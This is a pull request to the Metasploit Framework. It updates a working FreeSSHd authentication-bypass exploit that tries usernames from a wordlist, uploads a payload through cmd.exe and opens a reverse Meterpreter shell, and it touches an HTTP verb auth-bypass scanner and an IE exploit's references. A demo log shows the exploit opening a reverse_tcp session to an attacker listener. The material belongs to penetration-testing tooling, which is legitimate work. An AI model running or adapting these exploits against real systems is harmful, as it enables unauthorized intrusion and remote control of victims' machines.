### PR TITLE
Freesshd authbypass update

### DIFF
--- a/modules/auxiliary/scanner/http/verb_auth_bypass.rb
+++ b/modules/auxiliary/scanner/http/verb_auth_bypass.rb
@@ -42,7 +42,9 @@ class Metasploit3 < Msf::Auxiliary
 				'HEAD',
 				'TRACE',
 				'TRACK',
-				'Wmap'
+				'Wmap',
+				'get',
+				'trace'
 			]
 
 

--- a/modules/auxiliary/scanner/http/verb_auth_bypass.rb
+++ b/modules/auxiliary/scanner/http/verb_auth_bypass.rb
@@ -8,7 +8,6 @@
 
 require 'msf/core'
 
-
 class Metasploit3 < Msf::Auxiliary
 
 	# Exploit mixins should be called first
@@ -21,13 +20,13 @@ class Metasploit3 < Msf::Auxiliary
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'   		=> 'HTTP Verb Authentication Bypass Scanner',
-			'Description'	=> %q{
+			'Name'          => 'HTTP Verb Authentication Bypass Scanner',
+			'Description'   => %q{
 				This module test for authentication bypass using different HTTP verbs.
 
 			},
-			'Author' 		=> [ 'et [at] metasploit.com' ],
-			'License'		=> BSD_LICENSE))
+			'Author'        => [ 'et [at] metasploit.com' ],
+			'License'       => BSD_LICENSE))
 
 		register_options(
 			[
@@ -35,74 +34,70 @@ class Metasploit3 < Msf::Auxiliary
 			], self.class)
 	end
 
-	# Fingerprint a single host
 	def run_host(ip)
-
-		verbs = [
-				'HEAD',
-				'TRACE',
-				'TRACK',
-				'Wmap',
-				'get',
-				'trace'
-			]
-
-
 		begin
-			res = send_request_raw({
-				'uri'          => normalize_uri(datastore['PATH']),
-				'method'       => 'GET'
-			}, 10)
-
-			if res
-
-				auth_code = res.code
-
-				if res.headers['WWW-Authenticate']
-					print_status("#{ip} requires authentication: #{res.headers['WWW-Authenticate']} [#{auth_code}]")
-
-					report_note(
-						:host	=> ip,
-						:proto => 'tcp',
-						:sname => (ssl ? 'https' : 'http'),
-						:port	=> rport,
-						:type	=> 'WWW_AUTHENTICATE',
-						:data	=> "#{datastore['PATH']} Realm: #{res.headers['WWW-Authenticate']}",
-						:update => :unique_data
-					)
-
-					verbs.each do |tv|
-						resauth = send_request_raw({
-							'uri'          => normalize_uri(datastore['PATH']),
-							'method'       => tv
-						}, 10)
-
-						if resauth
-							print_status("Testing verb #{tv} resp code: [#{resauth.code}]")
-							if resauth.code != auth_code and resauth.code <= 302
-								print_status("Possible authentication bypass with verb #{tv} code #{resauth.code}")
-
-								# Unable to use report_web_vuln as method is not in list of allowed methods.
-
-								report_note(
-									:host	=> ip,
-									:proto => 'tcp',
-									:sname => (ssl ? 'https' : 'http'),
-									:port	=> rport,
-									:type	=> 'AUTH_BYPASS_VERB',
-									:data	=> "#{datastore['PATH']} Verb: #{tv}",
-									:update => :unique_data
-								)
-
-							end
-						end
-					end
-				else
-					print_status("[#{ip}] Authentication not required. #{datastore['PATH']} #{res.code}")
-				end
-			end
+			test_verbs(ip)
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
 		rescue ::Timeout::Error, ::Errno::EPIPE
 		end
 	end
+
+	def test_verbs(ip)
+		verbs = [ 'HEAD', 'TRACE', 'TRACK', 'Wmap', 'get', 'trace' ]
+
+		res = send_request_raw({
+			'uri'          => normalize_uri(datastore['PATH']),
+			'method'       => 'GET'
+		}, 10)
+
+		return if not res
+
+		if not res.headers['WWW-Authenticate']
+			print_status("[#{ip}] Authentication not required. #{datastore['PATH']} #{res.code}")
+			return
+		end
+
+		auth_code = res.code
+
+		print_status("#{ip} requires authentication: #{res.headers['WWW-Authenticate']} [#{auth_code}]")
+
+		report_note(
+			:host   => ip,
+			:proto  => 'tcp',
+			:sname  => (ssl ? 'https' : 'http'),
+			:port   => rport,
+			:type   => 'WWW_AUTHENTICATE',
+			:data   => "#{datastore['PATH']} Realm: #{res.headers['WWW-Authenticate']}",
+			:update => :unique_data
+		)
+
+		verbs.each do |tv|
+			resauth = send_request_raw({
+				'uri'          => normalize_uri(datastore['PATH']),
+				'method'       => tv
+			}, 10)
+
+			next if not resauth
+
+			print_status("Testing verb #{tv}, resp code: [#{resauth.code}]")
+
+			if resauth.code != auth_code and resauth.code <= 302
+				print_status("Possible authentication bypass with verb #{tv} code #{resauth.code}")
+
+				# Unable to use report_web_vuln as method is not in list of allowed methods.
+
+				report_note(
+					:host   => ip,
+					:proto  => 'tcp',
+					:sname  => (ssl ? 'https' : 'http'),
+					:port   => rport,
+					:type   => 'AUTH_BYPASS_VERB',
+					:data   => "#{datastore['PATH']} Verb: #{tv}",
+					:update => :unique_data
+				)
+			end
+		end
+	end
+
 end
+

--- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb
@@ -48,6 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					[ 'CVE', '2012-4792' ],
 					[ 'US-CERT-VU', '154201' ],
 					[ 'BID', '57070' ],
+					[ 'MSB', 'MS13-008' ],
 					[ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'],
 					[ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'],
 					[ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ],

--- a/modules/exploits/windows/ssh/freesshd_authbypass.rb
+++ b/modules/exploits/windows/ssh/freesshd_authbypass.rb
@@ -1,6 +1,12 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
 
 require 'msf/core'
-require 'tempfile'
+
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
@@ -42,9 +48,16 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		register_options(
 			[
-				OptInt.new('RPORT', [false, 'The target port', 22]),
-				OptString.new('USERNAMES',[true,'Space Separate list of usernames to try for ssh authentication','root admin Administrator'])
+				Opt::RPORT(22),
+				OptString.new('USERNAME', [false, 'A specific username to try']),
+				OptPath.new(
+					'USER_FILE',
+					[ true, "File containing usernames, one per line",
+					# Defaults to unix_users.txt, because this is the closest one we can try
+					File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt") ]
+				)
 			], self.class)
+
 	end
 
 	def load_netssh
@@ -60,9 +73,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		connect
 		banner = sock.recv(30)
 		disconnect
-		if banner =~ /SSH-2.0-WeOnlyDo/
+		if banner =~ /SSH\-2\.0\-WeOnlyDo/
 			version=banner.split(" ")[1]
-			return Exploit::CheckCode::Vulnerable if version =~ /(2.1.3|2.0.6)/
+			return Exploit::CheckCode::Vulnerable if version =~ /(2\.1\.3|2\.0\.6)/
 			return Exploit::CheckCode::Appears
 		end
 		return Exploit::CheckCode::Safe
@@ -85,9 +98,9 @@ class Metasploit3 < Msf::Exploit::Remote
 			raise ArgumentError
 		end
 		cmds.each { |cmd|
-			ret = connection.exec!("cmd.exe /c "+cmd)
+			connection.exec!("cmd.exe /c "+cmd)
+			
 		}
-
 	end
 
 	def setup_ssh_options
@@ -103,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def do_login(username,options)
-		print_status("Trying username "+username)
+		print_status("Trying username '#{username}'")
 		options[:username]=username
 
 		transport = Net::SSH::Transport::Session.new(datastore['RHOST'], options)
@@ -114,13 +127,34 @@ class Metasploit3 < Msf::Exploit::Remote
 			Timeout.timeout(10) do
 				connection.exec!('cmd.exe /c echo')
 			end
-		rescue  RuntimeError
+		rescue RuntimeError
 			return nil
-		rescue	Timeout::Error
+		rescue Timeout::Error
 			print_status("Timeout")
 			return nil
 		end
 		return connection
+	end
+
+	#
+	# Cannot use the auth_brute mixin, because if we do, a payload handler won't start.
+	# So we have to write our own each_user here.
+	#
+	def each_user(&block)
+		user_list = []
+		if datastore['USERNAME'] and !datastore['USERNAME'].empty?
+			user_list << datastore['USERNAME']
+		else
+			f = File.open(datastore['USER_FILE'], 'rb')
+			buf = f.read
+			f.close
+
+			user_list = (user_list | buf.split).uniq
+		end
+
+		user_list.each do |user|
+			block.call(user)
+		end
 	end
 
 	def exploit
@@ -133,21 +167,22 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
-		options=setup_ssh_options
+		options = setup_ssh_options
 
 		connection = nil
 
-		usernames=datastore['USERNAMES'].split(' ')
-		usernames.each { |username|
+		each_user do |username|
+			next if username.empty?
 			connection=do_login(username,options)
 			break if connection
-		}
+		end
 
 		if connection
-			print_status("Uploading payload. (This step can take up to 5 minutes. But if you are here, it will probably work. Have faith.)")
+			print_status("Uploading payload, this may take several minutes...")
 			upload_payload(connection)
 			handler
 		end
 	end
+
 end
 


### PR DESCRIPTION
Allows usernames to be loaded as a file (wordlist), that way it's much easier to manage.  It defaults to unix_users.txt, because these usernames are common in any SSH hosts out there.
If the user only wants to try a specific user (which is better, because you reduce traffic noise that way), then he/she can set the USERNAME option, and that should be the only one tried -- similar to how AuthBrute behaves.

I also fixed the regex in check().

Demo:

```
msf  exploit(freesshd_authbypass) > show options

Module options (exploit/windows/ssh/freesshd_authbypass):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST      10.0.1.6         yes       The target address
   RPORT      22               yes       The target port
   USERNAME                    no        A specific username to try
   USER_FILE  /tmp/users.txt   yes       File containing usernames, one per line


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     10.0.1.3         yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Freesshd <= 1.2.6 / Windows (Universal)


msf  exploit(freesshd_authbypass) > exploit

[*] Started reverse handler on 10.0.1.3:4444 
[*] Trying username 'root'
[*] Trying username 'Administrator'
[*] Trying username 'apple'
[*] Trying username 'lab'
[*] Uploading payload, this may take several minutes...
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 2 opened (10.0.1.3:4444 -> 10.0.1.6:1079) at 2013-01-16 02:13:56 -0600

meterpreter >
```
